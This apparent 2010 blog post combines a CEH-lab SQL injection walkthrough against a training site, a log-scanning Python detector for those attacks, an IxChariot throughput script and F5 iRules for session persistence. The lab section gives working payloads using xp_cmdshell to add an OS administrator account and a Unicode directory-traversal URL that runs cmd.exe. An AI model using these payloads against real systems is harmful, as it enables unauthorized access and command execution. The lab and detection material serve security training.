Friday, March 19, 2010

JuggyBank SQL Injection Mini Lab Demo

This lab depends on the "juggybank" website that comes with the CEH courseware, with SQL Server installed on the target machine. These are simple examples of SQL injection attacks, but if they work, almost any SQL statement will work as well. If the database is something other than SQL Server, only the syntax of the SQL statements changes; the basis for the attack is the weak ASP scripts used for the juggybank login.

Hack Script
Point your browser to the juggybank site. Enter a single tick into the username field or the address bar. If a page comes back saying "access is denied" or "CGI error", then you are in business.

Paste this into the username field. It creates a new user 'furynax' with password 'loop' at the application level.
';insert into userinfo values('furynax','loop')--


Paste this into the address bar to create user furynax at the OS level with normal user privileges.
';exec master..xp_cmdshell 'net user /add furynax loop';--


Use this command in the browser address bar to give user furynax Administrator privileges.
';exec master..xp_cmdshell 'net localgroup Administrators /add furynax loop';--


Paste this command into the address bar to list the C: drive of the victim machine. Similarly, you can use mkdir or other native MS-DOS commands. The only real limits are your skill and imagination.
http://(victim ip)/scripts/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
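As an added defensive example (not part of the original lab): a small Python scanner that runs detection rules over constructed IIS-style log lines carrying the request strings shown above, so the tick probe, stacked queries, xp_cmdshell calls and the overlong-UTF-8 traversal stand out in web server logs. The log format, field order and IP addresses are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS-style log lines (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status);
# not real traffic. The query strings reuse the injection strings shown in the lab above.
SAMPLE_LOG = """\
2010-03-19 10:01:02 10.0.0.5 POST /juggybank/login.asp username=alice&password=secret 200
2010-03-19 10:01:09 10.0.0.7 POST /juggybank/login.asp username=%27&password=x 500
2010-03-19 10:01:15 10.0.0.7 GET /juggybank/login.asp username=%27%3Binsert+into+userinfo+values(%27furynax%27,%27loop%27)-- 200
2010-03-19 10:01:33 10.0.0.7 GET /juggybank/login.asp username=%27%3Bexec+master..xp_cmdshell+%27net+user+/add+furynax+loop%27%3B-- 200
2010-03-19 10:02:01 10.0.0.7 GET /scripts/..%c0%af../..%c0%af../winnt/system32/cmd.exe /c+dir+c:\\ 200
2010-03-19 10:02:40 10.0.0.9 GET /juggybank/index.asp - 200
"""

# Each rule is run against both the raw and the percent-decoded URI. The traversal rule
# needs the raw form: %c0%af is an overlong, invalid UTF-8 encoding of "/", so decoding
# yields replacement characters rather than a slash.
RULES = [
    ("lone-quote-param",   re.compile(r"=['\"](?:&|$)")),                                # tick probe
    ("sqli-stacked-query", re.compile(r"'\s*;\s*(?:insert|exec|update|delete|drop)\b", re.I)),
    ("xp_cmdshell",        re.compile(r"xp_cmdshell", re.I)),
    ("unicode-traversal",  re.compile(r"\.\.(?:%c0%af|%c1%9c|/|\\)\.\.", re.I)),
    ("cmd-exe",            re.compile(r"cmd\.exe", re.I)),
]

def parse_line(line):
    """Split one log line into its seven fields (any extra fields would land in 'status')."""
    date, time, ip, method, stem, query, status = line.split(maxsplit=6)
    return {"date": date, "time": time, "ip": ip, "method": method,
            "stem": stem, "query": query, "status": status}

def scan_log(text):
    """Return (client ip, uri stem, [matched rule names]) for every suspicious line."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        f = parse_line(line)
        raw = f["stem"] + ("" if f["query"] == "-" else "?" + f["query"])
        decoded = unquote_plus(raw)          # %27 -> ', %3B -> ;, + -> space
        hits = [name for name, rx in RULES if rx.search(raw) or rx.search(decoded)]
        if hits:
            findings.append((f["ip"], f["stem"], hits))
    return findings

if __name__ == "__main__":
    for ip, stem, hits in scan_log(SAMPLE_LOG):
        print(f"{ip} {stem} -> {', '.join(hits)}")
```

The 500 status on the tick probe line is the log-side view of the "CGI error" page the lab looks for, so status codes are worth correlating with the rule hits.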


IxChariot High Performance Throughput Script

IxChariot is a test tool for simulating applications and assessing network performance. This script emulates sending a file from Endpoint 1 to Endpoint 2 and getting a confirmation back. The default file size is 100,000 bytes; the version below raises file_size to 10,000,000 bytes and collects 100 timing records.
Endpoint 1                               Endpoint 2
----------                               ----------
SLEEP
  initial_delay=0
CONNECT_INITIATE                         CONNECT_ACCEPT
  source_port=AUTO                         destination_port=AUTO
  0                                        0
  0                                        0
LOOP                                     LOOP
  number_of_timing_records=100             number_of_timing_records=100
  START_TIMER
  LOOP                                   LOOP
    transactions_per_record=1              transactions_per_record=1
    SEND                                   RECEIVE
      file_size=10000000                     file_size=10000000
      send_buffer_size=65535                 receive_buffer_size=65535
      send_datatype=NOCOMPRESS
      send_data_rate=UNLIMITED
    CONFIRM_REQUEST                        CONFIRM_ACKNOWLEDGE
    INCREMENT_TRANSACTION
  END_LOOP                               END_LOOP
  END_TIMER
  SLEEP
    transaction_delay=0
END_LOOP                                 END_LOOP
DISCONNECT                               DISCONNECT
  close_type=Reset                         close_type=Reset

JSessionID-Based Persistence

Universal Persistence
BIG-IP LTM software includes the Universal Inspection Engine (UIE). The UIE is a set of functions that lets you direct and persist load-balanced traffic using iRules. Universal persistence uses the UIE to persist sessions based on content data, or based on connections to a specific pool member, by defining a sequence of bytes in the connection to use as the session identifier.

iRule Example
The following iRule example illustrates how the LTM can find a cookie called FURYNAX in the first response from the server and add a persistence record for that cookie value. Subsequent client requests carrying the same cookie, either as a Cookie header or in the URL-rewritten form ;FURYNAX=<id>, persist to the same pool member.

when CLIENT_ACCEPTED {
    # Add at most one persistence record per client connection
    set add_persist 1
}

when HTTP_RESPONSE {
    # The first server response that sets the FURYNAX cookie creates the record
    if { [HTTP::cookie exists "FURYNAX"] and $add_persist } {
        persist add uie [HTTP::cookie "FURYNAX"]
        set add_persist 0
    }
}

when HTTP_REQUEST {
    if { [HTTP::cookie exists "FURYNAX"] } {
        persist uie [HTTP::cookie "FURYNAX"]
    } else {
        # No cookie header: look for the URL-rewritten form ;FURYNAX=<id> in the URI.
        # The skip count is the cookie name length plus one for "=", so 8 for FURYNAX
        # (a skip count of 13 would drop the first five characters of the value).
        set jsess [findstr [HTTP::uri] "FURYNAX" 8 ";"]
        if { $jsess != "" } {
            persist uie $jsess
        }
    }
}

More iRule examples

The same pattern for a CSP session cookie and for a standard JSESSIONID. The skip count again equals the cookie name length plus one: 34 for "CSPSESSIONID-SP-57772-UP-csp-sys-" and 11 for "JSESSIONID".

when CLIENT_ACCEPTED {
    set add_persist 1
}

when HTTP_RESPONSE {
    if { [HTTP::cookie exists "CSPSESSIONID-SP-57772-UP-csp-sys-"] and $add_persist } {
        persist add uie [HTTP::cookie "CSPSESSIONID-SP-57772-UP-csp-sys-"]
        set add_persist 0
    }
}

when HTTP_REQUEST {
    if { [HTTP::cookie exists "CSPSESSIONID-SP-57772-UP-csp-sys-"] } {
        persist uie [HTTP::cookie "CSPSESSIONID-SP-57772-UP-csp-sys-"]
    } else {
        # 33 characters of cookie name plus "=" -> skip 34
        set jsess [findstr [HTTP::uri] "CSPSESSIONID-SP-57772-UP-csp-sys-" 34 ";"]
        if { $jsess != "" } {
            persist uie $jsess
        }
    }
}

when CLIENT_ACCEPTED {
    set add_persist 1
}

when HTTP_RESPONSE {
    if { [HTTP::cookie exists "JSESSIONID"] and $add_persist } {
        persist add uie [HTTP::cookie "JSESSIONID"]
        set add_persist 0
    }
}

when HTTP_REQUEST {
    if { [HTTP::cookie exists "JSESSIONID"] } {
        persist uie [HTTP::cookie "JSESSIONID"]
    } else {
        # 10 characters of cookie name plus "=" -> skip 11
        set jsess [findstr [HTTP::uri] "JSESSIONID" 11 ";"]
        if { $jsess != "" } {
            persist uie $jsess
        }
    }
}
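To make the request/response flow of the JSESSIONID iRule concrete, here is an added Python model of it (not F5 code, and a simplification: a record is created whenever a tracked Set-Cookie is seen rather than once per connection). It assumes findstr returns the text after the match plus the skip count, up to the terminator or the end of the string; the session id and member addresses are constructed sample values.

```python
# Added example (not F5 code): Python model of the JSESSIONID iRule above. Assumed findstr
# semantics: text after the match plus skip_count chars, up to the terminator or end of string.
# Session ids and member addresses are constructed sample values.
def findstr(string, search, skip, terminator):
    """Model of the iRule findstr command (assumed semantics)."""
    i = string.find(search)
    if i < 0:
        return ""
    end = string.find(terminator, i + skip)
    return string[i + skip:] if end < 0 else string[i + skip:end]

def skip_count(cookie_name):
    """Characters to skip so findstr starts after 'NAME=': 11 for JSESSIONID."""
    return len(cookie_name) + 1

class UiePersistence:
    def __init__(self, cookie_name, pool):
        self.cookie = cookie_name
        self.pool, self.next = pool, 0   # members, round-robined when no record matches
        self.table = {}                  # universal persistence table: session id -> member

    def session_id(self, request):
        """HTTP_REQUEST: prefer the cookie, else the ;NAME=value form in the URI."""
        if self.cookie in request.get("cookies", {}):
            return request["cookies"][self.cookie]
        return findstr(request["uri"], self.cookie, skip_count(self.cookie), ";")

    def on_request(self, request):
        """Return the member a request is pinned to, or load-balance when no record exists."""
        sid = self.session_id(request)
        member = self.table.get(sid) if sid else None
        if member is None:
            member = self.pool[self.next % len(self.pool)]
            self.next += 1
        return member

    def on_response(self, member, response):
        """HTTP_RESPONSE: a Set-Cookie for the tracked name creates the record (persist add uie)."""
        sid = response.get("set_cookies", {}).get(self.cookie)
        if sid and sid not in self.table:
            self.table[sid] = member

def demo():
    p = UiePersistence("JSESSIONID", ["10.251.44.2", "10.251.44.5"])
    first = p.on_request({"uri": "/app/login", "cookies": {}})        # no record: load-balanced
    p.on_response(first, {"set_cookies": {"JSESSIONID": "abc123"}})  # record created
    by_cookie = p.on_request({"uri": "/app/next", "cookies": {"JSESSIONID": "abc123"}})
    by_uri = p.on_request({"uri": "/app/next;JSESSIONID=abc123", "cookies": {}})
    with_query = p.on_request({"uri": "/app/next;JSESSIONID=abc123?x=1", "cookies": {}})  # misses
    return first, by_cookie, by_uri, with_query
```

The last request in demo() shows the weak spot of the findstr approach: with ";" as the only terminator, a query string after the rewritten session id is swallowed into the lookup key, so that request is load-balanced afresh instead of persisting.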

Validate Persistence Records

[root@ltm1:Active] config # b persist show all
PERSISTENT CONNECTIONS --
Mode: universal Value: nVTLLvHDy9GQJQ4T29LPwsLqXXCB2pTGJ3KR49WhpvvBwZyPrxQT!-167612729!-671022569
Virtual: 10.251.3.144:https Node: 10.251.44.2:any Age: 231sec

Mode: source addr Value: 10.21.33.39
Virtual: 10.251.3.145:https Node: 10.251.44.5:any Age: 12sec

Mode: universal Value: Cn18LvHQR8dyZH1S1BmnSxVGcDMvHz12JlTFnJFryvKZpgrrTBdZ!-167612729!-671022569
Virtual: 10.251.3.144:https Node: 10.251.44.2:any Age: 288sec

Mode: universal Value: G4JbLvHXFg2LrXnz71hyJWBGLgT7fQXJbw4G5nhvFThh2pDfymLY!-671022569!-167612729
Virtual: 10.251.3.144:https Node: 10.251.44.2:any Age: 188sec